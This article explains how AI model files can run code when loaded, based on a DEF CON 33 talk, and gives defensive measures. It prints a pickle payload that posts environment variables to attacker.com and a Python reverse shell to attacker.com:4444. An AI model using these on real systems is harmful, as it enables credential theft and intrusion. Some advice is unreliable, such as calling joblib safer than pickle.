Loading Models, Launching Shells: The Hidden Dangers of AI File Formats
TLDR: AI model files can execute malicious code when loaded, turning your ML pipeline into an attack vector. Security researcher Cyrus Parzian demonstrated at DEF CON 33 how popular AI frameworks blindly execute code embedded in model files. This isn’t about sophisticated exploits - it’s about the fundamental design of AI model formats that prioritize convenience over security. Essential reading for DevOps, ML engineers, and security architects deploying AI systems.
The Threat: Your Model Is More Than Data
You download a state-of-the-art language model from a popular repository. You load it into your production system using PyTorch or TensorFlow. The model performs perfectly. Behind the scenes, it’s also executing malicious code, exfiltrating your data, and establishing persistence in your infrastructure.
This isn’t science fiction. At DEF CON 33, security researcher Cyrus Parzian demonstrated how AI model files have become the perfect trojan horses, exploiting the trust relationship between developers and their models.
Understanding AI Model Formats: More Than Weights and Biases
Modern AI models aren’t just collections of mathematical weights. They’re complex packages containing:
Model Architecture: Code defining how the model processes data Weights and Parameters: The trained values that make the model work Preprocessing Logic: Code that transforms input data Custom Layers: Arbitrary Python code for specialized functionality Metadata: Information about training, versioning, and dependencies
Popular formats like PyTorch (.pth), TensorFlow SavedModel, Pickle (.pkl), and Hugging Face models all support embedding executable code alongside model data. This design choice prioritized developer convenience over security.
The Security Flaw: Execution by Default
When you load an AI model, frameworks often execute any embedded code automatically. This happens because:
Serialization Formats: Python’s pickle module, used extensively in ML, can execute arbitrary code during deserialization Custom Layers: Models can define custom neural network layers with embedded Python code Preprocessing Hooks: Models can include data transformation code that runs before inference Dynamic Loading: Frameworks dynamically import and execute model-defined modules
How the Attack Works
Step 1: Model Poisoning Attackers create or modify legitimate models, embedding malicious code in custom layers or serialization data.
Step 2: Distribution Poisoned models are uploaded to model repositories, shared via collaboration platforms, or distributed through supply chain compromises.
Step 3: Innocent Loading
Developers load the model using standard framework APIs like torch.load() or tf.saved_model.load().
Step 4: Silent Execution The malicious code executes with the same privileges as the ML application, often in production environments with extensive access.
Step 5: Persistence and Exfiltration Attackers establish backdoors, steal training data, modify model behavior, or pivot to other systems.
Why This Is Catastrophic
Universal Trust Model ML practitioners routinely load models from untrusted sources, treating them as data rather than executable code.
Production Impact Models are often loaded in high-privilege environments with access to sensitive data, cloud credentials, and internal networks.
Detection Challenges
- Malicious code can be obfuscated within model parameters
- Execution happens during normal model loading operations
- Traditional security tools don’t inspect model file contents
- Behavioral changes may be subtle and delayed
Supply Chain Amplification A single poisoned model can compromise every system that loads it, creating massive supply chain attacks.
Real-World Impact
DevOps and Infrastructure Risks
Container Compromise Models loaded in containerized environments can escape containers, access host systems, and spread laterally.
Cloud Account Takeover ML workloads often run with broad cloud permissions, enabling attackers to access storage, databases, and other services.
CI/CD Pipeline Compromise Automated model training and deployment pipelines become attack vectors for compromising development infrastructure.
Credential Theft Models can access environment variables, configuration files, and secret management systems.
AI/ML Engineering Risks
Training Data Theft Malicious models can exfiltrate proprietary training datasets, violating privacy and intellectual property.
Model Backdoors Attackers can subtly modify model behavior, creating backdoors that activate under specific conditions.
Research Integrity Compromised models can produce biased or incorrect results, undermining research validity.
Competitive Intelligence Model architectures and hyperparameters can be stolen, revealing competitive advantages.
Security Architecture Risks
Defense Evasion Malicious code in models can disable security tools, modify logs, or establish covert channels.
Privilege Escalation Model loading often requires elevated permissions, providing attackers with initial access for further exploitation.
Data Exfiltration Models can access and transmit sensitive data, bypassing traditional data loss prevention controls.
Lateral Movement Compromised ML systems can become pivot points for attacking other network resources.
Technical Explanation: The Mechanics of Model Exploitation
Pickle Deserialization Attacks
Python’s pickle format is inherently unsafe. When loading pickled data, Python executes any code embedded in the serialization stream:
# Malicious pickle payload
import os
import pickle
class MaliciousPayload:
def __reduce__(self):
return (os.system, ('curl -X POST attacker.com/exfil -d "$(env)"',))
# This executes the payload when unpickled
malicious_data = pickle.dumps(MaliciousPayload())
pickle.loads(malicious_data) # Shell command executes here
Custom Layer Exploitation
PyTorch and TensorFlow allow custom layers with arbitrary Python code:
import torch
import torch.nn as nn
class BackdoorLayer(nn.Module):
def __init__(self):
super().__init__()
# Malicious code executes during layer initialization
os.system("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"attacker.com\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'")
def forward(self, x):
return x # Normal functionality preserved
SavedModel Exploitation
TensorFlow SavedModel format can include custom operations and preprocessing functions:
# saved_model.pb contains references to malicious Python modules
# When loaded, TensorFlow automatically imports and executes the code
import tensorflow as tf
# This loads and executes embedded code
model = tf.saved_model.load('malicious_model/')
Protection Strategies
Immediate Actions
1. Model Source Validation
- Only use models from trusted, verified sources
- Implement model signing and verification processes
- Maintain an approved model registry
- Audit model provenance and supply chain
2. Sandboxed Model Loading
- Load models in isolated environments without network access
- Use containers with minimal privileges and no host access
- Implement resource limits to prevent system exhaustion
- Monitor file system and network activity during model loading
3. Static Analysis
- Scan model files for embedded code before loading
- Use tools like
pickle-inspectorto analyze pickle contents - Implement automated model security scanning in CI/CD pipelines
- Validate model file integrity with checksums and signatures
Technical Safeguards
Safe Loading Practices
# Avoid unsafe loading methods
# NEVER DO THIS:
model = torch.load('untrusted_model.pth') # Unsafe!
model = pickle.load(open('model.pkl', 'rb')) # Unsafe!
# Use safer alternatives:
model = torch.load('model.pth', weights_only=True) # PyTorch 1.13+
model = joblib.load('model.pkl') # Safer than pickle for ML models
# For TensorFlow, use signature validation:
model = tf.saved_model.load('model/', tags=['serve'])
Environment Isolation
# Use dedicated model loading containers
docker run --rm --network=none --read-only \
-v /models:/models:ro \
-v /output:/output:rw \
ml-sandbox:latest python load_model.py
# Implement AppArmor/SELinux policies for ML processes
# Use seccomp to restrict system calls
Model Validation Pipeline
import hashlib
import subprocess
def validate_model(model_path, expected_hash):
# Verify file integrity
with open(model_path, 'rb') as f:
actual_hash = hashlib.sha256(f.read()).hexdigest()
if actual_hash != expected_hash:
raise SecurityError("Model hash mismatch")
# Scan for malicious content
result = subprocess.run(['model-scanner', model_path],
capture_output=True, text=True)
if result.returncode != 0:
raise SecurityError("Model failed security scan")
return True
Organizational Policies
Model Governance
- Establish model approval processes with security review
- Implement model lifecycle management with security checkpoints
- Require security training for ML engineers and data scientists
- Create incident response procedures for model compromise
Supply Chain Security
- Audit model repositories and sources
- Implement model signing and verification requirements
- Use private model registries for internal models
- Monitor for supply chain compromises affecting ML dependencies
Infrastructure Hardening
- Segment ML workloads from production systems
- Use least-privilege access for ML services
- Implement network monitoring for ML environments
- Regular security assessments of ML infrastructure
What Needs to Change
Framework-Level Fixes
- Default to data-only model loading with explicit opt-in for code execution
- Built-in sandboxing and mandatory model signing/verification
- Integrated static analysis tools and runtime monitoring
Industry Standards
- Security benchmarks for model formats and certification programs
- Standardized model signing protocols and security disclosures
- Security-focused repositories with mandatory scanning and automated testing tools
The Bigger Picture
Paradigm Shift Required
From Data to Code: We must treat models as executable code, not passive data From Trust to Verification: Model loading needs the same security rigor as software deployment From Convenience to Security: The ML community must prioritize security over ease of use
Broader Implications
AI Supply Chain Security: Model poisoning represents a new class of supply chain attacks ML in Production: Security practices must evolve to match the risks of production ML systems Developer Education: ML practitioners need security training specific to AI systems Regulatory Compliance: Model security may become subject to regulatory requirements
Teaching Others: Key Messages
When explaining model security risks:
Use Concrete Examples: “Loading a model file can be like running a program - it might do more than you expect.”
Emphasize Ubiquity: “Every framework and format has this problem - PyTorch, TensorFlow, scikit-learn, and others.”
Focus on Prevention: “Treat model files like executable code. Verify sources, scan contents, and use sandboxing.”
Highlight Business Impact: “A compromised model can steal data, disrupt services, and compromise entire systems.”
Conclusion: Securing the AI Revolution
Cyrus Parzian’s DEF CON 33 research exposes a fundamental security flaw in how we handle AI models. The convenience of loading arbitrary models has created massive attack surfaces that traditional security tools don’t address.
The solution requires:
- Technical changes: Secure loading mechanisms and sandboxing
- Process changes: Model governance and supply chain security
- Cultural changes: Treating models as code, not data
As AI becomes more critical to business operations, model security must evolve from an afterthought to a foundational requirement. The future of AI depends on building security into every layer of the stack.
Remember: Every model you load is potential code execution. In the age of AI, your models are only as trustworthy as their sources.
Key Acronyms
AI - Artificial Intelligence
ML - Machine Learning
PyTorch - Open-source machine learning framework
TensorFlow - Google’s machine learning platform
DEF CON - Hacker convention where security research is presented
CI/CD - Continuous Integration/Continuous Deployment
API - Application Programming Interface
CVE - Common Vulnerabilities and Exposures
ONNX - Open Neural Network Exchange format
GPU - Graphics Processing Unit
CPU - Central Processing Unit
IoC - Indicators of Compromise
SIEM - Security Information and Event Management
SOC - Security Operations Center
YARA - Pattern matching engine for malware identification
References
-
Parzian, C. “Loading Models, Launching Shells: The Hidden Dangers of AI File Formats.” DEF CON 33 (2025).
-
PyTorch Security Documentation: https://pytorch.org/docs/stable/notes/serialization.html
-
TensorFlow Secure Model Loading: https://www.tensorflow.org/guide/saved_model
-
OWASP Machine Learning Security Top 10: https://owasp.org/www-project-machine-learning-security-top-10/
-
NIST AI Risk Management Framework: https://www.nist.gov/itl/ai-risk-management-framework
-
“Adversarial Machine Learning Threat Matrix”: https://github.com/mitre/advmlthreatmatrix
-
Hugging Face Model Security Guidelines: https://huggingface.co/docs/hub/security